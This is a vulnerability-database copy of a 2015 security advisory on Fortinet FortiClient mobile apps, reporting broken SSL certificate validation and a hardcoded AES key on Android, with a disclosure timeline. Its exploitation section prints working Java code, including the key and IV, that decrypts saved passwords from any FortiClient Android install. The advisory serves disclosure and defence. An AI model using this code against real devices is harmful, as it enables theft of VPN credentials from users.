Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Fortinet FortiClient Hardcoded Encryption Keys / Broken SSL Validation

🗓️ 29 Jan 2015 00:00:00Reported by Denis AndzakovicType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 56 Views

Fortinet FortiClient Multiple Vulnerabilities found in Android and iOS applications including hard coded encryption keys and broken SSL validation

Code
`( , ) (,  
. '.' ) ('. ',  
). , ('. ( ) (  
(_,) .'), ) _ _,  
/ _____/ / _ \ ____ ____ _____  
\____ \==/ /_\ \ _/ ___\/ _ \ / \  
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/.-. \/ \/:wq  
(x.0)  
'=.|w|.='  
_=''"''=.  
  
presents..  
Fortinet FortiClient Multiple Vulnerabilities  
Affected Versions: Verified on FortiClient iOS v5.2.028 and FortiClient Android 5.2.3.091  
  
PDF:  
http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiClient_Multiple_Vulnerabilities.pdf  
  
+-------------+  
| Description |  
+-------------+  
This advisory details multiple vulnerabilities found within the Fortinet  
FortiClient mobile applications. Forticlient is an endpoint security suite,  
intended to provide an all-in-one security solution.  
  
Both the Android and iOS applications did not check the validity of SSL  
certificates, allowing an attacker performing a Man-In-The-Middle  
attack to gain access to sensitive information such as SSL VPN credentials and  
mobile device details.  
  
Hard coded encryption keys were discovered within the Android application.  
These encryption keys were found to be used to encrypt sensitive data stored  
within the application’s Shared Preferences. As this key does not change per  
instance, the decrypt code from an instance of a Forticlient application can  
be used to retrieve the passwords from any other Android Forticlient  
globally.  
  
+--------------+  
| Exploitation |  
+--------------+  
--[ Hardcoded Encryption Keys  
  
After decompiling the FortiClient Android application, the ‘qm’ class was  
found to contain a hard coded private string ‘KEY’. The character array was  
found to contain "FoRtInEt!AnDrOiD". This key is used to encrypt and decrypt  
saved passwords, stored within the application's shared preferences. The  
following Java code can be used to decrypt Android Forticlient shared  
preference parameter encrypted in this manner.  
  
import java.util.Locale;  
import javax.crypto.Cipher;  
import javax.crypto.spec.IvParameterSpec;  
import javax.crypto.spec.SecretKeySpec;  
  
public final class aa  
{  
private static final String KEY = new String(new char[] { 70, 111, 82, 116, 73, 110, 69, 116, 33, 65, 110, 68, 114, 79, 105, 68 });  
  
public static void main(String[] args){  
String crypted = "F3792242D92707AD537AACF429D8E28A";  
System.out.println("Encrypted String:" + crypted);  
System.out.println("Decrypted String:" + decrypt(crypted));  
}  
  
public static String decrypt(String paramString)  
{  
try  
{  
byte[] arrayOfByte = new byte[paramString.length() / 2];  
for (int i = 0; paramString.length() / 2 > i; i++)  
{  
int j = Integer.parseInt(paramString.substring(i * 2, 1 + i * 2), 16);  
arrayOfByte[i] = ((byte)(Integer.parseInt(paramString.substring(1 + i * 2, 2 + i * 2), 16) + j * 16));  
}  
IvParameterSpec localIvParameterSpec = new IvParameterSpec(new byte[] { 117, 122, 39, 67, 114, 124, 115, 44, 113, 116, 124, 123, 58, 89, 118, 94 });  
SecretKeySpec localSecretKeySpec = new SecretKeySpec(KEY.getBytes(), "AES");  
Cipher localCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");  
localCipher.init(2, localSecretKeySpec, localIvParameterSpec);  
String str = new String(localCipher.doFinal(arrayOfByte));  
return str;  
}  
catch (Exception localException)  
{  
}  
return null;  
}  
}  
  
--[ Broken SSL Certificate Validation  
  
By performing a Man-In-The-Middle attack, an attacker can host their own SSL  
server with a self-signed certificate and harvest credentials from legitimate  
end users. As the FortiClient SSL VPN client and Endpoint Control client do  
not validate certificates, the attacker can harvest credentials and  
mobile device information.  
  
The Android version of the FortiClient software was found to display a warning  
prompt when the SSL VPN server’s certificate is not trusted. The iOS version  
does not display any warnings to the user, regardless of whether or not the  
‘check server certificate’ option is enabled (one should note that by default  
this option is disabled). This exposes FortiClient iOS users to  
Man-In-The-Middle attacks.   
  
The Endpoint Control protocol, which attempts to connect to the devices default  
gateway on TCP port 8010, similarly does not validate SSL certificates. Both  
the FortiClient Android and iOS applications were found to ignore certificate  
validity for the endpoint control protocol and did not prompt the end user  
when the server’s certificate was invalid.  
  
+----------+  
| Solution |  
+----------+  
No official solution is currently available for these vulnerabilities.  
  
+---------------------+  
| Disclosure Timeline |  
+---------------------+  
08/10/2014 - Initial email sent to Fortinet PSIRT team.  
09/10/2014 - Advisory documents sent to Fortinet.  
15/10/2014 - Acknowledgement of advisories from Fortinet.  
16/10/2014 - Update requested from Fortinet.  
02/12/2014 - Update requested from Fortinet.  
13/12/2014 - Update requested from Fortinet.  
29/01/2015 - Advisory Release.  
  
+-------------------------------+  
| About Security-Assessment.com |  
+-------------------------------+  
  
Security-Assessment.com is Australasia's leading team of Information Security  
consultants specialising in providing high quality Information Security   
services to clients throughout the Asia Pacific region. Our clients include  
some of the largest globally recognised companies in areas such as finance,  
telecommunications, broadcasting, legal and government. Our aim is to provide  
the very best independent advice and a high level of technical expertise while  
creating long and lasting professional relationships with our clients.  
  
Security-Assessment.com is committed to security research and development,  
and its team continues to identify and responsibly publish vulnerabilities  
in public and private software vendor's products. Members of the   
Security-Assessment.com R&D team are globally recognised through their release  
of whitepapers and presentations related to new security research.  
  
For further information on this issue or any of our service offerings,   
contact us:  
  
Web www.security-assessment.com  
Email info () security-assessment com  
Phone +64 4 470 1650  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jan 2015 00:00Current
7.4High risk
Vulners AI Score7.4
fortinet forticlientmultiple vulnerabilitiesmobile applicationsssl certificatesman-in-the-middle attacksensitive informationhard coded encryption keysdecryption codessl vpn credentialsandroidios.
56